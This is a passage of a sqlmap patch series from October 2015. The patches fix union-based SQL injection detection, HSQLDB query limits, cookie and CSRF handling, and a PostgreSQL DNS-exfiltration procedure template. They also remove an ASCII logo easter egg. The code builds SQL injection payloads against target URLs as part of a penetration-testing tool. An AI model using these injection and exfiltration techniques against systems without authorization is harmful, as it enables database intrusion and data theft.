xrange(startLimit, stopLimit): + output = _goInferenceFields(expression, expressionFields, expressionFieldsList, payload, num=num, charsetType=charsetType, firstChar=firstChar, lastChar=lastChar, dump=dump) + outputs.append(output) + except OverflowError: + errMsg = "boundary limits (%d,%d) are too large. Please rerun " % (startLimit, stopLimit) + errMsg += "with switch '--fresh-queries'" + raise SqlmapDataException(errMsg) except KeyboardInterrupt: print From 48619d9ae126b9057b847ff872eb3cb987ec38f8 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 12 Oct 2015 10:05:49 +0200 Subject: [PATCH 82/92] Fixes #1464 --- sqlmap.py | 9 +++++++-- 1 file changed, 7 insertions(+), 2 deletions(-) diff --git a/sqlmap.py b/sqlmap.py index d7bf52912..1fd6f47f7 100755 --- a/sqlmap.py +++ b/sqlmap.py @@ -77,7 +77,7 @@ def main(): errMsg = "your system does not properly handle non-ASCII paths. " errMsg += "Please move the sqlmap's directory to the other location" logger.error(errMsg) - exit() + raise SystemExit setPaths() @@ -122,7 +122,7 @@ def main(): except SqlmapBaseException as ex: errMsg = getSafeExString(ex) logger.critical(errMsg) - sys.exit(1) + raise SystemExit except KeyboardInterrupt: print @@ -142,6 +142,11 @@ def main(): errMsg = unhandledExceptionMessage() excMsg = traceback.format_exc() + if "No space left" in excMsg: + errMsg = "no space left on output device" + logger.error(errMsg) + raise SystemExit + for match in re.finditer(r'File "(.+?)", line', excMsg): file_ = match.group(1) file_ = os.path.relpath(file_, os.path.dirname(__file__)) From 570562369b0ba1636dc733c102340e50b053f106 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 13 Oct 2015 13:04:59 +0200 Subject: [PATCH 83/92] Further fixes for sqlmap to work properly with HSQLDB (WebGoat) --- lib/core/agent.py | 23 +++++-- lib/techniques/union/test.py | 116 ++++++++++++++++++----------------- plugins/generic/databases.py | 2 +- xml/queries.xml | 14 ++--- 4 files changed, 87 insertions(+), 68 deletions(-) diff --git a/lib/core/agent.py b/lib/core/agent.py index e2963f01b..310b46ad9 100644 --- a/lib/core/agent.py +++ b/lib/core/agent.py @@ -588,7 +588,7 @@ class Agent(object): else: return query - if Backend.getIdentifiedDbms() in (DBMS.MYSQL,): + if Backend.isDbms(DBMS.MYSQL): if fieldsExists: concatenatedQuery = concatenatedQuery.replace("SELECT ", "CONCAT('%s'," % kb.chars.start, 1) concatenatedQuery += ",'%s')" % kb.chars.stop @@ -615,6 +615,7 @@ class Agent(object): concatenatedQuery = concatenatedQuery.replace("SELECT ", "'%s'||" % kb.chars.start, 1) _ = unArrayizeValue(zeroDepthSearch(concatenatedQuery, " FROM ")) concatenatedQuery = "%s||'%s'%s" % (concatenatedQuery[:_], kb.chars.stop, concatenatedQuery[_:]) + concatenatedQuery = re.sub(r"('%s'\|\|)(.+)(%s)" % (kb.chars.start, re.escape(castedFields)), "\g<2>\g<1>\g<3>", concatenatedQuery) elif fieldsSelect: concatenatedQuery = concatenatedQuery.replace("SELECT ", "'%s'||" % kb.chars.start, 1) concatenatedQuery += "||'%s'" % kb.chars.stop @@ -885,15 +886,29 @@ class Agent(object): fromIndex = limitedQuery.index(" FROM ") untilFrom = limitedQuery[:fromIndex] fromFrom = limitedQuery[fromIndex + 1:] - orderBy = False + orderBy = None if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.SQLITE): limitStr = queries[Backend.getIdentifiedDbms()].limit.query % (num, 1) limitedQuery += " %s" % limitStr elif Backend.isDbms(DBMS.HSQLDB): - limitStr = queries[Backend.getIdentifiedDbms()].limit.query % (1, num) - limitedQuery += " %s" % limitStr + match = re.search(r"ORDER BY [^ ]+", limitedQuery) + if match: + limitedQuery = re.sub(r"\s*%s\s*" % match.group(0), " ", limitedQuery).strip() + limitedQuery += " %s" % match.group(0) + + if query.startswith("SELECT "): + limitStr = queries[Backend.getIdentifiedDbms()].limit.query % (num, 1) + limitedQuery = limitedQuery.replace("SELECT ", "SELECT %s " % limitStr, 1) + else: + limitStr = queries[Backend.getIdentifiedDbms()].limit.query2 % (1, num) + limitedQuery += " %s" % limitStr + + if not match: + match = re.search(r"%s\s+(\w+)" % re.escape(limitStr), limitedQuery) + if match: + orderBy = " ORDER BY %s" % match.group(1) elif Backend.isDbms(DBMS.FIREBIRD): limitStr = queries[Backend.getIdentifiedDbms()].limit.query % (num + 1, num + 1) diff --git a/lib/techniques/union/test.py b/lib/techniques/union/test.py index a498bf08c..1e194eefb 100644 --- a/lib/techniques/union/test.py +++ b/lib/techniques/union/test.py @@ -165,74 +165,78 @@ def _unionPosition(comment, place, parameter, prefix, suffix, count, where=PAYLO # Unbiased approach for searching appropriate usable column random.shuffle(positions) - # For each column of the table (# of NULL) perform a request using - # the UNION ALL SELECT statement to test it the target URL is - # affected by an exploitable union SQL injection vulnerability - for position in positions: - # Prepare expression with delimiters - randQuery = randomStr(UNION_MIN_RESPONSE_CHARS) - phrase = "%s%s%s".lower() % (kb.chars.start, randQuery, kb.chars.stop) - randQueryProcessed = agent.concatQuery("\'%s\'" % randQuery) - randQueryUnescaped = unescaper.escape(randQueryProcessed) + for charCount in (UNION_MIN_RESPONSE_CHARS << 2, UNION_MIN_RESPONSE_CHARS): + if vector: + break - # Forge the union SQL injection request - query = agent.forgeUnionQuery(randQueryUnescaped, position, count, comment, prefix, suffix, kb.uChar, where) - payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where) + # For each column of the table (# of NULL) perform a request using + # the UNION ALL SELECT statement to test it the target URL is + # affected by an exploitable union SQL injection vulnerability + for position in positions: + # Prepare expression with delimiters + randQuery = randomStr(charCount) + phrase = "%s%s%s".lower() % (kb.chars.start, randQuery, kb.chars.stop) + randQueryProcessed = agent.concatQuery("\'%s\'" % randQuery) + randQueryUnescaped = unescaper.escape(randQueryProcessed) - # Perform the request - page, headers = Request.queryPage(payload, place=place, content=True, raise404=False) - content = "%s%s".lower() % (removeReflectiveValues(page, payload) or "", \ - removeReflectiveValues(listToStrValue(headers.headers if headers else None), \ - payload, True) or "") + # Forge the union SQL injection request + query = agent.forgeUnionQuery(randQueryUnescaped, position, count, comment, prefix, suffix, kb.uChar, where) + payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where) - if content and phrase in content: - validPayload = payload - kb.unionDuplicates = len(re.findall(phrase, content, re.I)) > 1 - vector = (position, count, comment, prefix, suffix, kb.uChar, where, kb.unionDuplicates, False) + # Perform the request + page, headers = Request.queryPage(payload, place=place, content=True, raise404=False) + content = "%s%s".lower() % (removeReflectiveValues(page, payload) or "", \ + removeReflectiveValues(listToStrValue(headers.headers if headers else None), \ + payload, True) or "") - if where == PAYLOAD.WHERE.ORIGINAL: - # Prepare expression with delimiters - randQuery2 = randomStr(UNION_MIN_RESPONSE_CHARS) - phrase2 = "%s%s%s".lower() % (kb.chars.start, randQuery2, kb.chars.stop) - randQueryProcessed2 = agent.concatQuery("\'%s\'" % randQuery2) - randQueryUnescaped2 = unescaper.escape(randQueryProcessed2) + if content and phrase in content: + validPayload = payload + kb.unionDuplicates = len(re.findall(phrase, content, re.I)) > 1 + vector = (position, count, comment, prefix, suffix, kb.uChar, where, kb.unionDuplicates, False) - # Confirm that it is a full union SQL injection - query = agent.forgeUnionQuery(randQueryUnescaped, position, count, comment, prefix, suffix, kb.uChar, where, multipleUnions=randQueryUnescaped2) - payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where) + if where == PAYLOAD.WHERE.ORIGINAL: + # Prepare expression with delimiters + randQuery2 = randomStr(charCount) + phrase2 = "%s%s%s".lower() % (kb.chars.start, randQuery2, kb.chars.stop) + randQueryProcessed2 = agent.concatQuery("\'%s\'" % randQuery2) + randQueryUnescaped2 = unescaper.escape(randQueryProcessed2) - # Perform the request - page, headers = Request.queryPage(payload, place=place, content=True, raise404=False) - content = "%s%s".lower() % (page or "", listToStrValue(headers.headers if headers else None) or "") - - if not all(_ in content for _ in (phrase, phrase2)): - vector = (position, count, comment, prefix, suffix, kb.uChar, where, kb.unionDuplicates, True) - elif not kb.unionDuplicates: - fromTable = " FROM (%s) AS %s" % (" UNION ".join("SELECT %d%s%s" % (_, FROM_DUMMY_TABLE.get(Backend.getIdentifiedDbms(), ""), " AS %s" % randomStr() if _ == 0 else "") for _ in xrange(LIMITED_ROWS_TEST_NUMBER)), randomStr()) - - # Check for limited row output - query = agent.forgeUnionQuery(randQueryUnescaped, position, count, comment, prefix, suffix, kb.uChar, where, fromTable=fromTable) + # Confirm that it is a full union SQL injection + query = agent.forgeUnionQuery(randQueryUnescaped, position, count, comment, prefix, suffix, kb.uChar, where, multipleUnions=randQueryUnescaped2) payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where) # Perform the request page, headers = Request.queryPage(payload, place=place, content=True, raise404=False) - content = "%s%s".lower() % (removeReflectiveValues(page, payload) or "", \ - removeReflectiveValues(listToStrValue(headers.headers if headers else None), \ - payload, True) or "") - if content.count(phrase) > 0 and content.count(phrase) < LIMITED_ROWS_TEST_NUMBER: - warnMsg = "output with limited number of rows detected. Switching to partial mode" - logger.warn(warnMsg) - vector = (position, count, comment, prefix, suffix, kb.uChar, PAYLOAD.WHERE.NEGATIVE, kb.unionDuplicates, False) + content = "%s%s".lower() % (page or "", listToStrValue(headers.headers if headers else None) or "") - unionErrorCase = kb.errorIsNone and wasLastResponseDBMSError() + if not all(_ in content for _ in (phrase, phrase2)): + vector = (position, count, comment, prefix, suffix, kb.uChar, where, kb.unionDuplicates, True) + elif not kb.unionDuplicates: + fromTable = " FROM (%s) AS %s" % (" UNION ".join("SELECT %d%s%s" % (_, FROM_DUMMY_TABLE.get(Backend.getIdentifiedDbms(), ""), " AS %s" % randomStr() if _ == 0 else "") for _ in xrange(LIMITED_ROWS_TEST_NUMBER)), randomStr()) - if unionErrorCase and count > 1: - warnMsg = "combined UNION/error-based SQL injection case found on " - warnMsg += "column %d. sqlmap will try to find another " % (position + 1) - warnMsg += "column with better characteristics" - logger.warn(warnMsg) - else: - break + # Check for limited row output + query = agent.forgeUnionQuery(randQueryUnescaped, position, count, comment, prefix, suffix, kb.uChar, where, fromTable=fromTable) + payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where) + + # Perform the request + page, headers = Request.queryPage(payload, place=place, content=True, raise404=False) + content = "%s%s".lower() % (removeReflectiveValues(page, payload) or "", \ + removeReflectiveValues(listToStrValue(headers.headers if headers else None), \ + payload, True) or "") + if content.count(phrase) > 0 and content.count(phrase) < LIMITED_ROWS_TEST_NUMBER: + warnMsg = "output with limited number of rows detected. Switching to partial mode" + logger.warn(warnMsg) + vector = (position, count, comment, prefix, suffix, kb.uChar, PAYLOAD.WHERE.NEGATIVE, kb.unionDuplicates, False) + + unionErrorCase = kb.errorIsNone and wasLastResponseDBMSError() + + if unionErrorCase and count > 1: + warnMsg = "combined UNION/error-based SQL injection case found on " + warnMsg += "column %d. sqlmap will try to find another " % (position + 1) + warnMsg += "column with better characteristics" + logger.warn(warnMsg) + else: + break return validPayload, vector diff --git a/plugins/generic/databases.py b/plugins/generic/databases.py index ed3ac32eb..8070fc0ad 100644 --- a/plugins/generic/databases.py +++ b/plugins/generic/databases.py @@ -415,7 +415,7 @@ class Databases: colList = filter(None, colList) if conf.tbl: - if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2): + if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2, DBMS.HSQLDB): conf.tbl = conf.tbl.upper() tblList = conf.tbl.split(",") diff --git a/xml/queries.xml b/xml/queries.xml index c57a5b49f..98b79cac7 100644 --- a/xml/queries.xml +++ b/xml/queries.xml @@ -651,8 +651,8 @@ - - + + @@ -676,26 +676,26 @@ - + - + - + - + - + From c4df6f3a22a4a0d68d5b0778dc849a9a01e44248 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 13 Oct 2015 13:31:28 +0200 Subject: [PATCH 84/92] Fixes #1465 --- lib/request/connect.py | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/lib/request/connect.py b/lib/request/connect.py index b5f222882..4cb24888e 100644 --- a/lib/request/connect.py +++ b/lib/request/connect.py @@ -439,6 +439,11 @@ class Connect(object): logger.log(CUSTOM_LOGGING.TRAFFIC_OUT, requestMsg) + if conf.cj: + for cookie in conf.cj: + if cookie.value is None: + cookie.value = "" + conn = urllib2.urlopen(req) if not kb.authHeader and getRequestHeader(req, HTTP_HEADER.AUTHORIZATION) and (conf.authType or "").lower() == AUTH_TYPE.BASIC.lower(): From 80aca35dd13f96751caf6998c8389db9c3334f52 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 13 Oct 2015 15:00:59 +0200 Subject: [PATCH 85/92] Removing #1450 --- lib/core/settings.py | 49 -------------------------------------------- lib/parse/cmdline.py | 6 ------ 2 files changed, 55 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 3b53705ba..4ded4236a 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -682,52 +682,3 @@ th{ font-size:10px; } """ - -NNC5ED_LOGO = """ -MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM -MMWWMMMWWMMMWWMMMMWWMMMMWWMMMWWMMMMMWMMMWWWMMMMMMMWWMMMWWMWMWWWWMMMWWWMMMWMWWWMMMMMWWMMMMM -MMNNNMMNNMMWXNNMMMWNWMMWNWMMNNNWMMMNNWMWNNNMMMMMMWNNWMMNNWNWWWWWMNNWWNNNWNNWWWNWMMNNNNMMMM -MMWWWNWNXMMNNWNNMMMNNMWNWMMWXWNXWMMNXWMNNWNNMMMMMWNWNNWXNWNWWNWWNNWMMMWWWNNWWNNWMWXWNXWMMM -MMNNMWNNNMNNNNNXWMMMNNNNMMWNNNNXNMMNNWWNNNNXWMMMMWXWMNNNNWNWMMMMWNWMWWNNWNNWWWWMWNNNNXNMMM -MMNNMMWNNWNWMMMNNWMMWWNMMMNNMMMWNNWNWWNNMMMNNWMMMWNWMMNNWWNWWNNWMWNWWNNWMWWMMMWWNNWMMWNNMM -MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM -MMMMMMMMMMMMMMMMMMMMMNXXXXXXXXXXXXXXNMMMMMMMMMMMMMMMMMMWXXXXXXXXXXXXXXNMMMMMMMMMMMMMMMMMMM -MMMMMMMMMMMMMMMMMMMM00:,'',,;'...';cld0XXWMMMMMMMMWXXKxlc;'...';,,'',:O0MMMMMMMMMMMMMMMMMM -MMMMMMMMMMMMMMMMMMMNK,       .,;:.     .:kKXXXXXXKkc.     .:;,.       .XXMMMMMMMMMMMMMMMMM -MMMMMMMMMMMMMMMMMMM0W            ;d.      'c;,,;:,      .d;            N0MMMMMMMMMMMMMMMMM -MMMMMMMMMMMMMMMMMMM0W              K;                  'K.         .odoX0MMMMMMMMMMMMMMMMM -MMMMMMMMMMMMMMMMMMM0W            :l.          '         .cc        OOX00MMMMMMMMMMMMMMMMMM -MMMMMMMMMMMMMMMMMMMKX.         ':             .;           ;,       :lcN0MMMMMMMMMMMMMMMMM -MMMMMMMMMMMMMMMMMMMM0l        ;.               l             ;        ;0WMMMMMMMMMMMMMMMMM -MMMMMMMMMMMMMMMMMMMM0X       .                 l              .       O0MMMMMMMMMMMMMMMMMM -MMMMMMMMMMMWXXXXXMMMW0d                        :                     cKNMMMXXXXXXWMMMMMMMM -MMMMMMMMMMXKl. .dKNMMNKo      .'::             '          ;:,.      lKXMMN0d.  .:KKMMMMMMM -MMMMMMMMMM0:     dxkO0OKK;  ,KMMMN    ,ko.     .   lO:    0MMMXc  ,0X00OOxO      ;KXMMMMMM -MMMMMMMMMKX.             :  kMMMMM.  oMMMWo      cWMMMO   WMMMMK  c               :0WMMMMM -MMMMMMMMM0K             .'   kMMMMx .MMMMMM0    kMMMMMM: lMMMM0.  .'              ;0WMMMMM -MMMMMMMMMXK:   ;0XXXXXXKN.    'kWMMl:MMMMMMMd  cMMMMMMMo;MMMO,     XKXXXXXXXOo,.,o0XMMMMMM -MMMMMMMMMMNXX0XXNMMMMMMM0O       ,ldlkO0OOxl.   cxOO0OOodl,       k0WMMMMMMMMXXXXXMMMMMMMM -MMMMMMMMMMMMMMMMMMMMMMMMWO0                                      k0KWMMMMMMMMMMMMMMMMMMMMM -MMMMMMMMMMMMNKOooxKXXXXkoc,,.                ..                .;.,ldOXXXNMNXXXWMMMMMMMMMM -MMMMMMMMMMMWOd     :;.      .c.            oNMMWx            .o,       .;ldd:;ckKNMMMMMMMM -MMMMMMMMMMMW0:           .:d0XXOl'        'WKMMKN;        'lkXXXOo;.            l0WMMMMMMM -MMMMMMMMMMMMOx       .:d0XXWMMXXk0OO:.       0X.      .,kO0OKXMMMNXXOo;         .KXMMMMMMM -MMMMMMMMMMMM0o      ;XXNMMMMWK00kNOk0Xkx,          'dxKKkONkO0KNMMMMMNKN.       O0MMMMMMMM -MMMMMMMMMMMMXKd.  .lKXMMMMMMO0Kk0xKxXkKXX0Oo,..,lkOXX000xKxKkKO0WMMMMMM00.     d0MMMMMMMMM -MMMMMMMMMMMMMMXXXXXXWMMMMMM0W000WO00XK0NKk;;cll:,,xKN0N0000X0OKX0MMMMMMMXXxlloOKWMMMMMMMMM -MMMMMMMMMMMMMMMMMMMMMMMMMMM0WX0NK0KXKX00l;NdlollXN.x0KXKXK0KX0WX0MMMMMMMMMMNXNMMMMMMMMMMMM -MMMMMMMMMMMMMMMMMMMMMMMMMMMWXXNMNXXNMN0d ;,.ccc;.c'.k0MMWKXXMWXXNMMMMMMMMMMMMMMMMMMMMMMMMM -MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM0N  kKKKOOKKK: 'KXMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM -MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM0N  WMMlNKOMMx 'KXMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM -MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM0N  WMMdX0OMMx 'KXMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM -MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM0N  k00000000: 'KXMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM -MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMN0d::::::::::::k0MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM -MMMMMMMW00OOXMMMMMMMMMMMMMMMMMMMMMMMMMMXXXXXXXXXXXXXNMMMMMMMMMMN00O0WMMMMMMMMMMMMMMMMMMMMM -MMMMMMd;KMMK,:XMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMKlKMMMMMMMMMMXclNMWd,dMMMMMMMMMMMMMMMMMMMM -MMMMMO';NMMMxo0No:lccOM0oxdc:lNWd::;:xWNdk00loNl,';:NOc::;:kM:'oMMMXodW0c:l:oXMdokl:ckMMMM -MMMMMk''KMMNdxKo';WN''kk'dXK,'0o',dc''kl'0MMKkXK''KNMklldc',W;':MMM0xxX''xMx',W:,0Xd';MMMM -MMMMMWl,WMMW';XO,,K0',0k'dMN''K0cckx',Kk'0MMo,K0''kcd''ck,',WK;oMMMk'dWc'oXo':W:'XMx':MMMM -MMMMMMMXOO0KKWMMNOxxONMXOXMWkxNMKkxxONMMX0KK0NMM0xxOW0xxO0kOWMMKOO00NMMMKkxkKMMOOWMXxOMMMM -MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM - -""" \ No newline at end of file diff --git a/lib/parse/cmdline.py b/lib/parse/cmdline.py index 5c0dc16d7..68bad2f3f 100644 --- a/lib/parse/cmdline.py +++ b/lib/parse/cmdline.py @@ -17,7 +17,6 @@ from optparse import SUPPRESS_HELP from lib.core.common import checkDeprecatedOptions from lib.core.common import checkSystemEncoding -from lib.core.common import dataToStdout from lib.core.common import expandMnemonics from lib.core.common import getUnicode from lib.core.data import cmdLineOptions @@ -31,7 +30,6 @@ from lib.core.settings import BASIC_HELP_ITEMS from lib.core.settings import DUMMY_URL from lib.core.settings import IS_WIN from lib.core.settings import MAX_HELP_OPTION_LENGTH -from lib.core.settings import NNC5ED_LOGO from lib.core.settings import VERSION_STRING from lib.core.shell import autoCompletion from lib.core.shell import clearHistory @@ -930,10 +928,6 @@ def cmdLineParser(argv=None): if argv[i] == "-z": expandMnemonics(argv[i + 1], parser, args) - if args.nnc5ed: - dataToStdout(NNC5ED_LOGO) - raise SystemExit - if args.dummy: args.url = args.url or DUMMY_URL From e3ae026077e4e94b0b2d1d6456ac4581a7964bbe Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Wed, 14 Oct 2015 15:19:44 +0200 Subject: [PATCH 86/92] Fixes #1467 --- lib/request/connect.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/request/connect.py b/lib/request/connect.py index 4cb24888e..b57ca6933 100644 --- a/lib/request/connect.py +++ b/lib/request/connect.py @@ -849,7 +849,7 @@ class Connect(object): if headers and "text/plain" in headers.get(HTTP_HEADER.CONTENT_TYPE, ""): token = page - if not token and any(_.name == conf.csrfToken for _ in conf.cj): + if not token and conf.cj and any(_.name == conf.csrfToken for _ in conf.cj): for _ in conf.cj: if _.name == conf.csrfToken: token = _.value From 475ca5277a50f4f1a787c83f5bdb11cd7767e732 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Wed, 14 Oct 2015 16:11:11 +0200 Subject: [PATCH 87/92] Minor information update regarding #541 --- lib/core/update.py | 9 +++++++-- 1 file changed, 7 insertions(+), 2 deletions(-) diff --git a/lib/core/update.py b/lib/core/update.py index f2a8de322..7e0b802a7 100644 --- a/lib/core/update.py +++ b/lib/core/update.py @@ -30,7 +30,7 @@ def update(): if not os.path.exists(os.path.join(rootDir, ".git")): errMsg = "not a git repository. Please checkout the 'sqlmapproject/sqlmap' repository " - errMsg += "from GitHub (e.g. git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev)" + errMsg += "from GitHub (e.g. 'git clone https://github.com/sqlmapproject/sqlmap.git sqlmap')" logger.error(errMsg) else: infoMsg = "updating sqlmap to the latest development version from the " @@ -51,7 +51,12 @@ def update(): _ = lib.core.settings.REVISION = getRevisionNumber() logger.info("%s the latest revision '%s'" % ("already at" if "Already" in stdout else "updated to", _)) else: - logger.error("update could not be completed ('%s')" % re.sub(r"\W+", " ", stderr).strip()) + if "Not a git repository" in stderr: + errMsg = "not a valid git repository. Please checkout the 'sqlmapproject/sqlmap' repository " + errMsg += "from GitHub (e.g. 'git clone https://github.com/sqlmapproject/sqlmap.git sqlmap')" + logger.error(errMsg) + else: + logger.error("update could not be completed ('%s')" % re.sub(r"\W+", " ", stderr).strip()) if not success: if IS_WIN: From 956047b43fcd9dd1a6b8569892653c93e25ba93e Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Thu, 15 Oct 2015 13:07:43 +0200 Subject: [PATCH 88/92] Patch for an Issue #1468 --- lib/request/redirecthandler.py | 3 +++ 1 file changed, 3 insertions(+) diff --git a/lib/request/redirecthandler.py b/lib/request/redirecthandler.py index 73fa73f19..3359f59e7 100644 --- a/lib/request/redirecthandler.py +++ b/lib/request/redirecthandler.py @@ -30,6 +30,7 @@ from lib.core.settings import MAX_SINGLE_URL_REDIRECTIONS from lib.core.settings import MAX_TOTAL_REDIRECTIONS from lib.core.threads import getCurrentThreadData from lib.request.basic import decodePage +from lib.request.basic import parseResponse class SmartRedirectHandler(urllib2.HTTPRedirectHandler): def _get_header_redirect(self, headers): @@ -118,6 +119,8 @@ class SmartRedirectHandler(urllib2.HTTPRedirectHandler): result = fp if redurl and kb.redirectChoice == REDIRECTION.YES: + parseResponse(content, headers) + req.headers[HTTP_HEADER.HOST] = getHostHeader(redurl) if headers and HTTP_HEADER.SET_COOKIE in headers: req.headers[HTTP_HEADER.COOKIE] = headers[HTTP_HEADER.SET_COOKIE].split(conf.cookieDel or DEFAULT_COOKIE_DELIMITER)[0] From f793a26095832e3e26ced344aa616ed32bac062c Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Thu, 15 Oct 2015 16:00:59 +0200 Subject: [PATCH 89/92] Removing ugly duplicating of \ (hidden bugs came - e.g. DNS exfiltration) --- lib/core/agent.py | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/lib/core/agent.py b/lib/core/agent.py index 310b46ad9..67222ccc2 100644 --- a/lib/core/agent.py +++ b/lib/core/agent.py @@ -187,12 +187,12 @@ class Agent(object): if origValue: regex = r"(\A|\b)%s=%s%s" % (re.escape(parameter), re.escape(origValue), r"(\Z|\b)" if origValue[-1].isalnum() else "") - retVal = _(regex, "%s=%s" % (parameter, self.addPayloadDelimiters(newValue.replace("\\", "\\\\"))), paramString) + retVal = _(regex, "%s=%s" % (parameter, self.addPayloadDelimiters(newValue)), paramString) else: - retVal = _(r"(\A|\b)%s=%s(\Z|%s|%s|\s)" % (re.escape(parameter), re.escape(origValue), DEFAULT_GET_POST_DELIMITER, DEFAULT_COOKIE_DELIMITER), "%s=%s\g<2>" % (parameter, self.addPayloadDelimiters(newValue.replace("\\", "\\\\"))), paramString) + retVal = _(r"(\A|\b)%s=%s(\Z|%s|%s|\s)" % (re.escape(parameter), re.escape(origValue), DEFAULT_GET_POST_DELIMITER, DEFAULT_COOKIE_DELIMITER), "%s=%s\g<2>" % (parameter, self.addPayloadDelimiters(newValue)), paramString) if retVal == paramString and urlencode(parameter) != parameter: - retVal = _(r"(\A|\b)%s=%s" % (re.escape(urlencode(parameter)), re.escape(origValue)), "%s=%s" % (urlencode(parameter), self.addPayloadDelimiters(newValue.replace("\\", "\\\\"))), paramString) + retVal = _(r"(\A|\b)%s=%s" % (re.escape(urlencode(parameter)), re.escape(origValue)), "%s=%s" % (urlencode(parameter), self.addPayloadDelimiters(newValue)), paramString) if retVal: retVal = retVal.replace(BOUNDARY_BACKSLASH_MARKER, '\\') From 20559fd52c1040cc9dcbcd96898f7ccfea3aea7c Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Thu, 15 Oct 2015 16:01:09 +0200 Subject: [PATCH 90/92] Minor patch --- procs/postgresql/dns_request.sql | 1 + 1 file changed, 1 insertion(+) diff --git a/procs/postgresql/dns_request.sql b/procs/postgresql/dns_request.sql index dd04d8663..653395cbe 100644 --- a/procs/postgresql/dns_request.sql +++ b/procs/postgresql/dns_request.sql @@ -1,4 +1,5 @@ DROP TABLE IF EXISTS %RANDSTR1%; +CREATE LANGUAGE plpgsql; CREATE TABLE %RANDSTR1%(%RANDSTR2% text); CREATE OR REPLACE FUNCTION %RANDSTR3%() RETURNS VOID AS $$ From c51de99a25dbb8356cd36501c85881b4282e2d1d Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Thu, 15 Oct 2015 16:38:48 +0200 Subject: [PATCH 91/92] Minor revert --- procs/postgresql/dns_request.sql | 1 - 1 file changed, 1 deletion(-) diff --git a/procs/postgresql/dns_request.sql b/procs/postgresql/dns_request.sql index 653395cbe..dd04d8663 100644 --- a/procs/postgresql/dns_request.sql +++ b/procs/postgresql/dns_request.sql @@ -1,5 +1,4 @@ DROP TABLE IF EXISTS %RANDSTR1%; -CREATE LANGUAGE plpgsql; CREATE TABLE %RANDSTR1%(%RANDSTR2% text); CREATE OR REPLACE FUNCTION %RANDSTR3%() RETURNS VOID AS $$ From d762098cce5c35aab849a0225dcbe81ef4c75eca Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Thu, 15 Oct 2015 16:51:53 +0200 Subject: [PATCH 92/92] Leaving a reference just in case --- procs/postgresql/dns_request.sql | 1 + 1 file changed, 1 insertion(+) diff --git a/procs/postgresql/dns_request.sql b/procs/postgresql/dns_request.sql index dd04d8663..6724af223 100644 --- a/procs/postgresql/dns_request.sql +++ b/procs/postgresql/dns_request.sql @@ -1,4 +1,5 @@ DROP TABLE IF EXISTS %RANDSTR1%; +# https://wiki.postgresql.org/wiki/CREATE_OR_REPLACE_LANGUAGE <- if "CREATE LANGUAGE plpgsql" is required CREATE TABLE %RANDSTR1%(%RANDSTR2% text); CREATE OR REPLACE FUNCTION %RANDSTR3%() RETURNS VOID AS $$